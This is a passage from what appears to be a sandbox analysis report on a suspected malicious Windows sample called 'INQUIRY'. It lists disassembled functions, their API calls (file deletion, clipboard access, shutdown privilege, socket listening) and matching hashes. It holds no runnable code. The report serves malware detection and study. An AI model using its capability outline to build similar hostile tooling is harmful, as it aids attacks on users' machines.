                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                              • API String ID: 834269672-1287834457
                                                                                              • Opcode ID: f08f42254625c10b997398f907584c7d2d272d29098d09ebcb1efed1edce9bca
                                                                                              • Instruction ID: 564413bbe8f4773d9bfc19a8ba2b8fb557f0bb85259c01675dbfef0b7c428158
                                                                                              • Opcode Fuzzy Hash: f08f42254625c10b997398f907584c7d2d272d29098d09ebcb1efed1edce9bca
                                                                                              • Instruction Fuzzy Hash: FB619B71608312AFC714EF64C948F6ABBE8AF49754F40481DF9869B291CF78ED44CB92
                                                                                              Function 00A84164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1737998785-0
                                                                                              • Opcode ID: b5fa6c38dc07309f43f506a7ac0532cbd5576ac0e1b43c2a369a71a967b36df2
                                                                                              • Instruction ID: eba458984965f7596c1c7e701b0f631cce6256b1a6b4fd2744ed46442556a091
                                                                                              • Opcode Fuzzy Hash: b5fa6c38dc07309f43f506a7ac0532cbd5576ac0e1b43c2a369a71a967b36df2
                                                                                              • Instruction Fuzzy Hash: A22171357012119FDB10AFA4DD19BAA7BA8FF05751F108026FA46DB261DB30AD42CB54
                                                                                              Function 00A737EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A14743,?,?,00A137AE,?), ref: 00A14770
                                                                                                • Part of subcall function 00A74A31: GetFileAttributesW.KERNEL32(?,00A7370B), ref: 00A74A32
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00A738A3
                                                                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00A7394B
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00A7395E
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00A7397B
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A7399D
                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00A739B9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 4002782344-1173974218
                                                                                              • Opcode ID: 5722b509cc4e5cf0f0fdbe8217f631ed0603453979c62dc4236eceea78434038
                                                                                              • Instruction ID: 31308b50083fc140f9c2fbbb92d84fd9aa075c5fa1e7392c1fc668b7d07ada72
                                                                                              • Opcode Fuzzy Hash: 5722b509cc4e5cf0f0fdbe8217f631ed0603453979c62dc4236eceea78434038
                                                                                              • Instruction Fuzzy Hash: 95515C3290514CAACF05EBA0DEA2DFDB779AF14300F608169E40AB7191EF316F49DB61
                                                                                              Function 00A7F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00A7F440
                                                                                              • Sleep.KERNEL32(0000000A), ref: 00A7F470
                                                                                              • _wcscmp.LIBCMT ref: 00A7F484
                                                                                              • _wcscmp.LIBCMT ref: 00A7F49F
                                                                                              • FindNextFileW.KERNEL32(?,?), ref: 00A7F53D
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A7F553
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                              • String ID: *.*
                                                                                              • API String ID: 713712311-438819550
                                                                                              • Opcode ID: 4d1dbdddd98cefbeeb9e034706db06624531dff5ef7ba629a95a78a6498521bb
                                                                                              • Instruction ID: 521a8498e018c24143443b73905b0c3ab0df1ecf73efb89eca019597612f4e8e
                                                                                              • Opcode Fuzzy Hash: 4d1dbdddd98cefbeeb9e034706db06624531dff5ef7ba629a95a78a6498521bb
                                                                                              • Instruction Fuzzy Hash: 7F416C7194421AAFCF14DFA4DC45AEEBBB8FF05314F148466E819A7191EB309B85CF90
                                                                                              Function 00A25760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID:
                                                                                              • API String ID: 4104443479-0
                                                                                              • Opcode ID: 6525a3ba35e342d890a34534e84c7bd800b6bc03e5c1a8d39a0babd31511a6cb
                                                                                              • Instruction ID: 1f9d75e814e00fed25ef5674aaa517eacb85130d3087b5b290e2d9af4cba4384
                                                                                              • Opcode Fuzzy Hash: 6525a3ba35e342d890a34534e84c7bd800b6bc03e5c1a8d39a0babd31511a6cb
                                                                                              • Instruction Fuzzy Hash: 0E127970E00619DFDF14DFA9DA81AEEB7F5FF48300F204569E846A7250EB36A991CB50
                                                                                              Function 00A73B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A14743,?,?,00A137AE,?), ref: 00A14770
                                                                                                • Part of subcall function 00A74A31: GetFileAttributesW.KERNEL32(?,00A7370B), ref: 00A74A32
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00A73B89
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A73BD9
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A73BEA
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A73C01
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A73C0A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 2649000838-1173974218
                                                                                              • Opcode ID: 4abacd5052acad7e6d41c2a9f10649e42517ca81ea126e769be0c29f0eacc064
                                                                                              • Instruction ID: f16e6f7c4097f2c350d371e3751073257d6539bd2e2bd295484b8da14d94e9cd
                                                                                              • Opcode Fuzzy Hash: 4abacd5052acad7e6d41c2a9f10649e42517ca81ea126e769be0c29f0eacc064
                                                                                              • Instruction Fuzzy Hash: 4D316F320083859FC601EB64CD918EFB7E8AE95314F448D2DF4E992191EB259A09D753
                                                                                              Function 00A751BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A6882B
                                                                                                • Part of subcall function 00A687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A68858
                                                                                                • Part of subcall function 00A687E1: GetLastError.KERNEL32 ref: 00A68865
                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00A751F9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                              • String ID: $@$SeShutdownPrivilege
                                                                                              • API String ID: 2234035333-194228
                                                                                              • Opcode ID: bf940fcb41fa7f41392075ac23ed2470e4661807a771e19127f8b870f926e6e0
                                                                                              • Instruction ID: 575cfb65f398f4482ca383a356e1482e7d6535f22284a3b49d1551784460ec71
                                                                                              • Opcode Fuzzy Hash: bf940fcb41fa7f41392075ac23ed2470e4661807a771e19127f8b870f926e6e0
                                                                                              • Instruction Fuzzy Hash: 3D01D431F916116BE72863789C8AFFA72ACAB05341F21C525F90BE20D3E9A11C0185D4
                                                                                              Function 00A86283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00A862DC
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00A862EB
                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00A86307
                                                                                              • listen.WSOCK32(00000000,00000005), ref: 00A86316
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00A86330
                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00A86344
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                              • String ID:
                                                                                              • API String ID: 1279440585-0
                                                                                              • Opcode ID: ec21559d94e7aa13b3797d1c71b2fcb60e3a7ca47a6ce3f24492f01eb46d0c9d
                                                                                              • Instruction ID: d09b6c1cdfadfc33b3134c7d8c3b77d7c97963ac52734808d7a638a05a115211
                                                                                              • Opcode Fuzzy Hash: ec21559d94e7aa13b3797d1c71b2fcb60e3a7ca47a6ce3f24492f01eb46d0c9d
                                                                                              • Instruction Fuzzy Hash: 6521AD316002049FDB10EFA4C949BAEB7B9EF49720F248169E916EB391CB70AD42CB51
                                                                                              Function 00A25520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A30DB6: std::exception::exception.LIBCMT ref: 00A30DEC
                                                                                                • Part of subcall function 00A30DB6: __CxxThrowException@8.LIBCMT ref: 00A30E01
                                                                                              • _memmove.LIBCMT ref: 00A60258
                                                                                              • _memmove.LIBCMT ref: 00A6036D
                                                                                              • _memmove.LIBCMT ref: 00A60414
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 1300846289-0
                                                                                              • Opcode ID: d18a3aa572f2c278aaf1ddd21e58eb3c23a6303b27a07e669be5434c77d5c4f0
                                                                                              • Instruction ID: 33b162c9c5c22a7886465d79d6d1065a550bcf613b14e1e24892f9e26ba22f88
                                                                                              • Opcode Fuzzy Hash: d18a3aa572f2c278aaf1ddd21e58eb3c23a6303b27a07e669be5434c77d5c4f0
                                                                                              • Instruction Fuzzy Hash: 82029DB0E00219DFCF04DF68DA91AAEBBB5FF44300F148469E80ADB255EB35D995CB91
                                                                                              Function 00A11287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623
                                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 00A119FA
                                                                                              • GetSysColor.USER32(0000000F), ref: 00A11A4E
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 00A11A61
                                                                                                • Part of subcall function 00A11290: DefDlgProcW.USER32(?,00000020,?), ref: 00A112D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ColorProc$LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3744519093-0
                                                                                              • Opcode ID: 2419f0b52502cccdb23453e65d590a60a777665b527dbf79cddedcc7294deeb2
                                                                                              • Instruction ID: 8eee8c970c826053f35baa3f6c79c9b237984ae25b926b6b121ecc8f2592296e
                                                                                              • Opcode Fuzzy Hash: 2419f0b52502cccdb23453e65d590a60a777665b527dbf79cddedcc7294deeb2
                                                                                              • Instruction Fuzzy Hash: A7A15A79216944BEEB28AB385D44EFF3DADDF813C1B24051AF712D5192CB24DD8192F1
                                                                                              Function 00A7BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00A7BCE6
                                                                                              • _wcscmp.LIBCMT ref: 00A7BD16
                                                                                              • _wcscmp.LIBCMT ref: 00A7BD2B
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00A7BD3C
                                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00A7BD6C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 2387731787-0
                                                                                              • Opcode ID: 7d83ab8b2e29326fdd85d1b26a29373d20d98604f62f2f9107741f11e6929df3
                                                                                              • Instruction ID: 719ba28e853f6d761e980ce76f83e2a01f0a7064e2e7911e371d264c9f381e5e
                                                                                              • Opcode Fuzzy Hash: 7d83ab8b2e29326fdd85d1b26a29373d20d98604f62f2f9107741f11e6929df3
                                                                                              • Instruction Fuzzy Hash: 095190756046019FD724DF68C891E9AB3E4FF49320F14851DF95A873A2DB30ED05CBA1
                                                                                              Function 00A86747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A87D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A87DB6
                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A8679E
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00A867C7
                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00A86800
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00A8680D
                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00A86821
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                              • String ID:
                                                                                              • API String ID: 99427753-0
                                                                                              • Opcode ID: 9a4bf109d3eacf19d32f605e4bdf398f321067974afd258d23a12f746a6fc68b
                                                                                              • Instruction ID: 664356d47171706129bb7e5afc5b83269d7e8c09e86fb3d4618bd95b35cecac6
                                                                                              • Opcode Fuzzy Hash: 9a4bf109d3eacf19d32f605e4bdf398f321067974afd258d23a12f746a6fc68b
                                                                                              • Instruction Fuzzy Hash: 5641D175B00210AFEB10BF648D96FBE77A8DF09B54F048458F91AAB3C2CA749D41CB91
                                                                                              Function 00A95376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                              • String ID:
                                                                                              • API String ID: 292994002-0
                                                                                              • Opcode ID: f4c752fea4262467047863064a4ea9d47e95c34fc0a3ffdaa4cec662ab7069ac
                                                                                              • Instruction ID: f60e70393b8b2d158749bbcfd0bc2c1ed27cc504b554b7a1eb113cf60a4c604c
                                                                                              • Opcode Fuzzy Hash: f4c752fea4262467047863064a4ea9d47e95c34fc0a3ffdaa4cec662ab7069ac
                                                                                              • Instruction Fuzzy Hash: 6911B231B009116FEF225F769C55AAB7BE9EF857A1B514029F846D7241CBB0DC42CBA0
                                                                                              Function 00A680A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A680C0
                                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A680CA
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A680D9
                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A680E0
                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A680F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 44706859-0
                                                                                              • Opcode ID: 4196606c78238db0e544bf454a5fedcb4d32956f6dfd9b5f3487651f63a68ad1
                                                                                              • Instruction ID: 7f60fe88729c263927195b1a6fbc65904156c96acfc81cfac8f752ace66f742e
                                                                                              • Opcode Fuzzy Hash: 4196606c78238db0e544bf454a5fedcb4d32956f6dfd9b5f3487651f63a68ad1
                                                                                              • Instruction Fuzzy Hash: 87F04F31340204AFEB104FA5EC8DE6B3BACEF4A755B100226F955C6150DE659C43DA60
                                                                                              Function 00A14B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00A14AD0), ref: 00A14B45
                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A14B57
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                              • API String ID: 2574300362-192647395
                                                                                              • Opcode ID: 979a64eaf9692d02a6e1fc3388ccc36bf1ba5133ee31150a3869f5eb727dd913
